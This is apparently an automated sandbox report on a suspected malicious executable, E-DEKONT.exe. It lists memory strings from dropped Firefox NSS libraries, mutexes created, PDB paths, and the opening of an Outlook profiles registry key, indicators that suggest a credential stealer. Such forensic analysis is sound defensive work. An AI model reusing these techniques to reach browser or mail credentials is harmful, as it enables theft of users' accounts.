                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1668:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1668:304:WilStaging_02
                  Source: C:\Users\user\Desktop\E-DEKONT.exeMutant created: \Sessions\1\BaseNamedObjects\AB1F56922-9414907A-A61E15EF-705FBD2D-EEC696EC
                  Source: C:\Users\user\Desktop\E-DEKONT.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
                  Source: C:\Users\user\Desktop\E-DEKONT.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fivefoldness\Endosseringerne\FouragenJump to behavior
                  Source: E-DEKONT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944571274.000000001E798000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108907116476.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-locale-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108911584847.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945279969.000000001E7C0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945375034.000000001E7C4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108911467372.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917692756.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108921948768.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108925127922.0000000000060000.00000004.00001000.00020000.00000000.sdmp, nss3.dll.4.dr
                  Source: Binary string: mshtml.pdb source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp
                  Source: Binary string: ucrtbase.pdb source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108961702192.000000001DC8C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108934547678.0000000000060000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108931941329.000000001E7D0000.00000004.00001000.00020000.00000000.sdmp, ucrtbase.dll.4.dr
                  Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885630583.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939584393.000000001E710000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-2-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108890563485.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940725893.000000001E730000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940489498.000000001E72C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940250648.000000001E728000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940858034.000000001E734000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-memory-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
                  Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-debug-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108898625241.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108899797081.000000001DDCC000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944393476.000000001E788000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108905955571.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108911584847.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108912726161.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.4.dr
                  Source: Binary string: mshtml.pdbUGP source: E-DEKONT.exe, 00000004.00000001.108602554916.0000000000649000.00000008.00000001.01000000.00000005.sdmp
                  Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940014730.000000001E724000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939745209.000000001E720000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108889185436.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-heap-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108901775165.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943865478.000000001E770000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943398108.000000001E764000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943738244.000000001E76C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943576314.000000001E768000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-util-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942446232.000000001E750000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942158900.000000001E74C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108897608996.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108943189299.000000001E75C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942964361.000000001E758000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108942711307.000000001E754000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108896445391.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-synch-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944279818.000000001E784000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-environment-l1-1-0.dll.4.dr
                  Source: Binary string: vcruntime140.i386.pdbGCTL source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108963064431.000000001DDA8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938291383.000000001DDD8000.00000004.00001000.00020000.00000000.sdmp, vcruntime140.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: E-DEKONT.exe, 00000004.00000003.108917940677.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948773767.000000001DA90000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108917692756.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, mozglue.dll.4.dr
                  Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108884832188.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108893462615.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108940953662.000000001E740000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941541486.000000001E744000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108941863598.000000001E748000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108946630089.000000001DA34000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108948115698.000000001DA3C000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945539144.000000001DA30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108914531041.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916052212.000000001D4D4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108916640113.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108947445173.000000001DA38000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.4.dr
                  Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109036371448.000000001E380000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-console-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108884832188.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939056355.000000001E704000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885416848.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939281482.000000001E708000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108938761713.000000001E700000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108885630583.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108939473726.000000001E70C000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-core-file-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108910182410.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108945064477.000000001E7AC000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108910928044.000000001DDD4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108944759936.000000001E7A8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-private-l1-1-0.dll.4.dr
                  Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: E-DEKONT.exe, 00000004.00000003.108944067627.000000001E780000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109021596669.000000001DE68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108903955995.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108902878047.000000001DDC4000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108904933284.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108904797866.000000001DDC8000.00000004.00001000.00020000.00000000.sdmp, api-ms-win-crt-convert-l1-1-0.dll.4.dr
                  Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: E-DEKONT.exe, 00000004.00000003.108948980402.000000001DAE0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108960120211.000000001DC68000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108928614927.000000001DDC0000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930111809.000000001DDF8000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108958463342.000000001DC50000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108955336928.000000001DB20000.00000004.00001000.00020000.00000000.sdmp, E-DEKONT.exe, 00000004.00000003.108930518819.000000001DDD0000.00000004.00001000.00020000.00000000.sdmp, softokn3.dll.4.dr
